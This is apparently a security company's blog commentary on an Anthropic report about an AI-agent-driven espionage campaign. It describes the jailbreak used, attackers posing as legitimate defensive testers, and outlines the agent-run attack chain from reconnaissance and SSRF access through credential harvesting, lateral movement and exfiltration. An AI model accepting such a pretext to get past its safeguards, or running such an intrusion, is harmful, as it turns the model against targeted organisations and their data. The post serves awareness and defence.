Agentic AI

Anthropic x China Implications

Max Corbridge

Cofounder

November 19, 2025

Well for those who have been anywhere near LinkedIn this week it will come as no surprise what I am covering in this update. It is, of course, the recent report from Anthropic in which they detail disrupting a Chinese nation-state hacking campaign that was run almost entirely using AI agents.

This is momentous for many different reasons, and the impact of this is more what I want to draw on today. I will begin by relatively briefly outlining what actually happened, but then provide my take aways from this event.

What happened?

Anthropic just released a report which detailed a full investigation into a Chinese nation-state hacking group, which they have coined GTG-1002, which successfully targeted 30 organisations and government agencies. Nation-state level hacking is nothing new - it happens quite literally 24/7 - but what made this stand out is that the actual hacking campaign was carried out '80-90%' by AI, not by human operators. How does Anthropic know this? The hackers were using Anthropic's most popular product, Claude Code.

How did the hackers get what is supposed to be 'safe' AI systems - heavily trained to resist being used for malicious purposes - to engage in this attack? Using one of the oldest and most simple tricks in the book...role play. The hackers quite literally told the AI system that they worked at legitimate cybersecurity companies and were performing defensive cybersecurity testing. This is the 'jailbreak' that I have been using personally for genuine purposes for years now, and I can vouch that it works, if with a bit of encouragement needed sometimes.

Anthropic's analysis of the campaign's activity revealed that agents were largely in the driving seat of this exercise, conducting 80-90% of the attack autonomously, with humans stepping in every now and again to approve or course-correct. How can they be sure? The speed at which the attack was conducted was only possible through autonomous AI. Hilariously, the report even states that the attack could have been more successful, but the AI was found to hallucinate certain bits of information, leading it to think it had found or exploited machines when it had, in fact, made the entire thing up.

Another thing worth pointing out was the actual setup the attackers used. As mentioned, this was done using a frontier AI provider's core product. Let that sink in - it wasn't some specially trained jailbroken custom model that the attackers trained up, but a generic AI system available to everyone in the world. Furthermore, they hadn't configured Claude Code in any particularly specialised way to achieve this - their setup simply involved an agent interacting with tools through MCP servers.

For those that are interested, the attack chain was as follows:

1) AI-driven reconnaissance and attack surface mapping on the potential targets for the attack, which included major financial institutions, tech firms, chemical manufacturing companies, and government agencies across multiple countries.

2) The initial access vector was SSRF, and exploitation was achieved through automated testing of the identified attack surface and validated through 'callback communication systems', or what we call in this space 'command and control' infrastructure, or simply C2. Achieving initial access via SSRF leaves only 2 weaponisation paths open in my mind - either SSRF -> RCE which is much trickier and requires several additional steps, or SSRF -> IMDS and grab the access token from the metadata endpoint. My bet is on the latter. To this point the only human action was to review the chosen exploit and approve it...

3) AI led the post-exploitation activities too, enumerating internal services (such as discovering metadata endpoints so +1 for my previous point around SSRF), credential harvesting, lateral movement, data exfiltration, and even persistence. Humans were still only involved for reviews and approvals

4) AI even generated comprehensive documentation for every stage of the attack, complete with actions taken, harvested credentials, etc. etc.

If the above doesn't give you pause for thought then I am not sure you are grasping the reality of the situation. To help shed some light on what this really means, here are my key conclusions.

What does this mean?

This is a big moment for AI security, and one we will likely look back on as a tipping point. 'AI powered hacking' was something that everyone knew to be theoretically possible, but very few real-world examples had been seen prior to this point. You could call out the success of AI-driven hacking tools like XBOW in recent times, but using AI to find a single weakness in a single technology (web) in isolation is nothing in comparison to what we see here, which constitutes a full, end-to-end sophisticated attack campaign following a multi-phase attack path and compromising real hardened targets. It almost feels like we've skipped a step, and gone from 'something like this is theoretically possible in the near future' to 'nation-states are currently using this to real-world effect against hardened targets'. Literally only 6 or so months I messaged a friend of mine when we saw XBOW topping leader boards for bug bounty hunting saying that this type of 'low commodity' hacking (single vuln, web only, known weakness exploitation) was going to be the first to be replaced by AI, but that full end to end simulated attacks against hardened targets were still 'years away'. Well, it appears I was wrong...yet again.
Next is how worryingly easy this could be to recreate. Let's just recap some of the facts...nation states used a (basically) free AI tool from a frontier AI provider, in a pretty standard and non-specialised setup, to automate basically everything apart from the occasional human review and approval, using the oldest and most basic jailbreak method: role playing a 'good guy'. This is the current state of AI security folks...and yet we're still seeing enterprises and AI providers sprinting to develop and adopt increasingly powerful & autonomous AI. It is worth clarifying that this is not fully automated, and there is 0 doubt in my mind that a skilled operator(s) would be required to setup and navigate a successful attack of this nature, but the barrier to entry has just been taken down about 10 rungs.
Less ground-breaking but still of concern is that we now have clear evidence that these AI-driven attack campaigns are going to allow attackers to move much faster. Why is this worthy of note? In security breaches there is almost always a game of cat and mouse going on between the attackers and the defenders. For reasons I won't get in to right now there is usually a 'dwell time' between when an attacker lands their first foothold within the environment and when they carry out the main 'breach activities'. Defenders also have a delay to detect and respond, which they measure with metrics like mean-time-to-detect (MTTD) and mean-time-to-respond (MTTR). Essentially, what I am getting at here is that most of cybersecurity defence, detection and response to hackers is based on human-led operations, and if things now move at double, triple or potentially even more times the pace of before this could spell disaster for the defending teams tasked to protect the organisation and the tooling which they are currently using.
Another, much less obvious, takeaway here is just how dangerous a compromised agent can be. To clarify, the agents which conducted this attack were not 'compromised' but rather intentionally misaligned by hackers. However, we have also seen a undeniable trend of late where attackers target unsuspecting individuals who are using benign agents and try to misalign them. What this incident shows is that if they are successful there is nothing stopping the likes of Claude Code, ChatGPT agent and any other agentic system from being quickly and easily weaponised into a hacking tool that can cause serious harm.
Finally, this shows in perfectly clear terms just how dire the current state of AI misalignment is. I've long said that AI in it's current form suffers from several crippling systemic vulnerabilities, one of which is its inability to detect when someone is actually using it for malicious purposes, or what we call 'misaligning' the AI system. Prompt injection is a problem without a defined solution and one that we don't see going away any time soon. Yet we're now graduating from GenAI to the much more dangerous younger brother agentic or autonomous AI. As predicted, the reality that these systems are not secure right down to their core technology is now being laid out for all to see in how attackers are leveraging the technology for bad.

Honestly the more I write on this the bigger of an event I think it is - crazy stuff.

blogs

Our Latest Thoughts

Interviews, tips, guides, industry best practices, and news.